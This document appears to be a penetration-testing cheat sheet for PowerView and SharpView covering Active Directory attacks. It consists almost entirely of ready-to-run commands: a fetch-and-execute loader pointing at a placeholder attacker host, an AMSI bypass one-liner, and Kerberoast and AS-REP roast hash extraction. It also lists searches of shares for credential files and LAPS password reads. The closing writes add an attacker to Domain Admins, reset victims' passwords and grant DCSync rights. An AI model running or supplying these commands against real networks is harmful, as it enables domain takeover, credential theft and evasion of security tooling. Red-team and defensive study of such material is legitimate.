PowerView / SharpView
aka PowerView, SharpView, PowerSploit, AD Enumeration PowerShell
PowerView and SharpView complete command reference: domain/user/group/computer/GPO/trust/ACL enumeration, Kerberoast and ASREP targets, delegation discovery, LAPS, SPN management, and offensive PowerShell for AD attack chains.
Ports
| Port | Proto | Notes |
|---|---|---|
| 389 | tcp | LDAP — all PowerView queries |
Fingerprint
- Import-Module ./PowerView.ps1 or load from memory via IEX(New-Object Net.WebClient).DownloadString()
- SharpView.exe mirrors PowerView in C# — runs without PowerShell
Key files
| Path | Holds | Sensitive |
|---|---|---|
| PowerView.ps1 | AD enumeration + offensive functions | |
| SharpView.exe | C# port of PowerView — bypasses PS logging | |
Exploitation primitives
- Get-DomainUser / Get-DomainComputer / Get-DomainGroup cover all object enumeration
- Get-DomainObjectAcl -ResolveGUIDs surfaces ACL abuse paths before running BloodHound
- Find-LocalAdminAccess finds lateral movement targets from current credential
- Invoke-Kerberoast and Get-DomainUser -KerberosPreauthNotRequired enumerate roast targets
Load PowerView
# Loading PowerView: three PowerShell routes plus the SharpView binary; pick one.
# Disk
Import-Module C:\Tools\PowerView.ps1
# Memory (from attacker web server) — ATTACKER is a placeholder host, replace before use
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')
# Bypass execution policy — one-shot: new process, import, run a single query
powershell -ep bypass -c "Import-Module .\PowerView.ps1; Get-DomainUser"
# AMSI bypass first (if AV/EDR active)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Import-Module .\PowerView.ps1
# SharpView (no PowerShell needed) — same verb-noun command names, passed as arguments
.\SharpView.exe Get-DomainUser -Identity administrator
.\SharpView.exe Find-LocalAdminAccess
Domain / Forest Enumeration
# Domain the session belongs to, and its SID
Get-Domain
Get-DomainSID
# Domain controllers: current domain, then an explicit child domain
Get-DomainController
Get-DomainController -Domain 'child.domain.local'
# Forest, every domain in it, and the global catalog servers
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
# Default domain policy; the 'system access' section carries the password/lockout values
$policy = Get-DomainPolicy
$policy
$policy.'system access'
# Trusts: current domain, a named child domain, forest level, then the recursive map
Get-DomainTrust
Get-DomainTrust -Domain 'child.domain.local'
Get-ForestTrust
Get-DomainTrustMapping
User Enumeration
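# Every user, by sAMAccountName
Get-DomainUser | Select-Object samaccountname
# One user
Get-DomainUser -Identity administrator
# Accounts with an SPN set (Kerberoast candidates)
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# Request a service ticket for each SPN account and emit it in hashcat format.
# This does NOT check for active sessions; use Find-DomainUserLocation for that.
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat
# Accounts that do not require Kerberos pre-authentication (AS-REP roast candidates)
Get-DomainUser -KerberosPreauthNotRequired | Select-Object samaccountname
# Accounts with a non-empty description/info — common resting place for stray credentials.
# $null goes on the left so a multi-valued attribute cannot turn -ne into an element filter.
Get-DomainUser | Where-Object { $null -ne $_.description } | Select-Object samaccountname, description
Get-DomainUser | Where-Object { $null -ne $_.info } | Select-Object samaccountname, info
# Disabled accounts (userAccountControl ACCOUNTDISABLE bit)
Get-DomainUser -UACFilter ACCOUNTDISABLE | Select-Object samaccountname
# adminCount=1: is, or once was, a member of a protected group
Get-DomainUser -AdminCount | Select-Object samaccountname
# PASSWD_NOTREQD bit: an empty password is permitted
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname
# Every attribute of one user
Get-DomainUser -Identity user -Properties *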
Group Enumeration
# Every group name
Get-DomainGroup | Select-Object name
# Membership of one group, expanding nested groups
Get-DomainGroupMember -Identity 'Domain Admins' -Recurse
# Groups a given user belongs to
Get-DomainGroup -UserName user | Select-Object name
# Groups carrying adminCount=1 (privileged)
Get-DomainGroup -AdminCount | Select-Object name
# Local groups on a remote host, then the local Administrators membership
Get-NetLocalGroup -ComputerName TARGET
Get-NetLocalGroupMember -ComputerName TARGET -GroupName Administrators
Computer Enumeration
# Every computer with its OS string
Get-DomainComputer | Select-Object dnshostname, operatingsystem
# Server OS only (wildcard match on operatingSystem)
Get-DomainComputer -OperatingSystem '*Server*' | Select-Object dnshostname, operatingsystem
# Hosts trusted for unconstrained delegation (escalation targets)
Get-DomainComputer -Unconstrained | Select-Object dnshostname
# Hosts configured for constrained delegation, with the services they may delegate to
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname, msds-allowedtodelegateto
# Restrict the search to one OU
Get-DomainComputer -SearchBase 'OU=Servers,DC=domain,DC=local'
# Only hosts that answer a ping
Get-DomainComputer -Ping | Select-Object dnshostname
GPO Enumeration
# Every GPO with its SYSVOL path
Get-DomainGPO | Select-Object displayname, gpcfilesyspath
# GPOs that apply to one computer
Get-DomainGPO -ComputerIdentity TARGET | Select-Object displayname
# GPO settings that alter local group membership (Restricted Groups)
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupMember
# Who lands in local groups on TARGET through GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity TARGET
# OUs with their GPO links
Get-DomainOU | Select-Object name, gplink
OU Enumeration
# Every OU with its DN
Get-DomainOU | Select-Object name, distinguishedname
# Computers under the 'Servers' OU (its DN becomes the search base)
Get-DomainOU -Identity 'Servers' | ForEach-Object { Get-DomainComputer -SearchBase $_.distinguishedname }
ACL / DACL Enumeration
# ACEs on one object, with schema/extended-right GUIDs resolved to names
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs
# Everything the 'attacker' principal holds rights on (domain-wide walk, slow)
$principal_sid = (Get-DomainUser -Identity attacker).objectsid
Get-DomainObjectAcl -ResolveGUIDs |
  Where-Object { $_.SecurityIdentifier -eq $principal_sid } |
  Select-Object ObjectDN, ActiveDirectoryRights
# Every GenericAll ACE in the domain
Get-DomainObjectAcl -ResolveGUIDs |
  Where-Object { $_.ActiveDirectoryRights -match 'GenericAll' } |
  Select-Object ObjectDN, IdentityReference
# Every WriteDacl ACE in the domain
Get-DomainObjectAcl -ResolveGUIDs |
  Where-Object { $_.ActiveDirectoryRights -match 'WriteDacl' } |
  Select-Object ObjectDN, IdentityReference
# Rights on the domain head that matter for DCSync
Get-DomainObjectAcl -Identity 'DC=domain,DC=local' -ResolveGUIDs |
  Where-Object { $_.ActiveDirectoryRights -match 'Replicating|GenericAll|WriteDacl' }
Share / File Enumeration
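# Shares exposed by one host
Get-NetShare -ComputerName TARGET
# Every share in the domain — no access check, so this lists what exists, not what is readable
Find-DomainShare
# Only shares the current credential can actually read
Find-DomainShare -CheckShareAccess
# Files on readable shares whose names suggest configs or credentials
Find-InterestingDomainShareFile -Include "*.config","*.xml","*.txt","*.csv","password*","cred*","*.kdbx"
# Files modified in the last 14 days. -LastWriteTime is the modification time;
# -LastAccessTime is the access time, which NTFS may not update at all.
Find-InterestingDomainShareFile -LastWriteTime (Get-Date).AddDays(-14)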
Logged-On Users / Sessions
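# Interactive logons on a remote host
Get-NetLoggedon -ComputerName TARGET
# SMB sessions open against a remote host
Get-NetSession -ComputerName TARGET
# Hosts where a given user is currently logged on, domain-wide
Find-DomainUserLocation -UserIdentity Administrator -Verbose
# Hosts where a member of a given group is logged on.
# The PowerView 3.0 parameter is -UserGroupIdentity (default 'Domain Admins');
# -GroupIdentity is not a parameter of this function and is not a prefix of one.
Find-DomainUserLocation -UserGroupIdentity 'Domain Admins' -Verbose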
Local Admin Discovery
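# Hosts on which the current credential is a local administrator (tries each host)
Find-LocalAdminAccess -Verbose
# Same check against a single host
Test-AdminAccess -ComputerName TARGET
# Members of the local Administrators group on every domain host, queried host by host.
# This is not the GPO-derived view; for that use Get-DomainGPOComputerLocalGroupMapping.
Find-DomainLocalGroupMember -GroupName Administrators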
Delegation Discovery
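# Unconstrained delegation: userAccountControl TRUSTED_FOR_DELEGATION, on users and computers.
# -UACFilter works whether or not this build accepts -Unconstrained on Get-DomainUser.
Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION | Select-Object samaccountname
Get-DomainComputer -Unconstrained | Select-Object dnshostname
# Constrained delegation: TRUSTED_TO_AUTH_FOR_DELEGATION plus the msDS-AllowedToDelegateTo
# list naming the services the account may delegate to.
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | Select-Object dnshostname, msds-allowedtodelegateto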
SPN / Kerberoast Operations
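# Every account with an SPN
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# Request a TGS for each SPN and write the hashcat-formatted hashes one per line.
# -ExpandProperty writes the raw string; a plain "Select-Object Hash" sends a formatted
# table (header row, lines truncated at console width) to the file.
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File tgs.txt
# Write an SPN onto a user (needs GenericWrite) — a directory write, audited where DS object auditing is enabled
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/spn'}
# Remove the SPN again
Set-DomainObject -Identity victim -Clear serviceprincipalname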
LAPS
# LAPS present? Computers carrying an ms-Mcs-AdmPwdExpirationTime value are LAPS-managed
Get-DomainComputer |
  Where-Object { $_.'ms-Mcs-AdmPwdExpirationTime' -ne $null } |
  Select-Object dnshostname
# ms-Mcs-AdmPwd reads as empty unless the caller has been granted read on that attribute
Get-DomainComputer | Select-Object dnshostname, ms-mcs-admpwd, ms-mcs-admpwdexpirationtime
# Same read via the AdmPwd.PS module that ships with LAPS
Get-AdmPwdPassword -ComputerName TARGET
Offensive Write Operations
# Every command below writes to the directory; each shows up in DS auditing where it is enabled.
# Group membership (needs AddMember on the group)
Add-DomainGroupMember -Identity 'Domain Admins' -Members attacker
# Password reset (needs GenericAll or the ForceChangePassword extended right)
$new_password = ConvertTo-SecureString "NewPass!" -AsPlainText -Force
Set-DomainUserPassword -Identity victim -AccountPassword $new_password
# Arbitrary attribute write
Set-DomainObject -Identity victim -Set @{description='modified'}
# Owner change
Set-DomainObjectOwner -Identity victim -OwnerIdentity attacker
# Grant an ACE (needs WriteDacl): full rights on one object, or replication rights on the domain head
Add-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity attacker -Rights DCSync
# Undo the object-level ACE
Remove-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All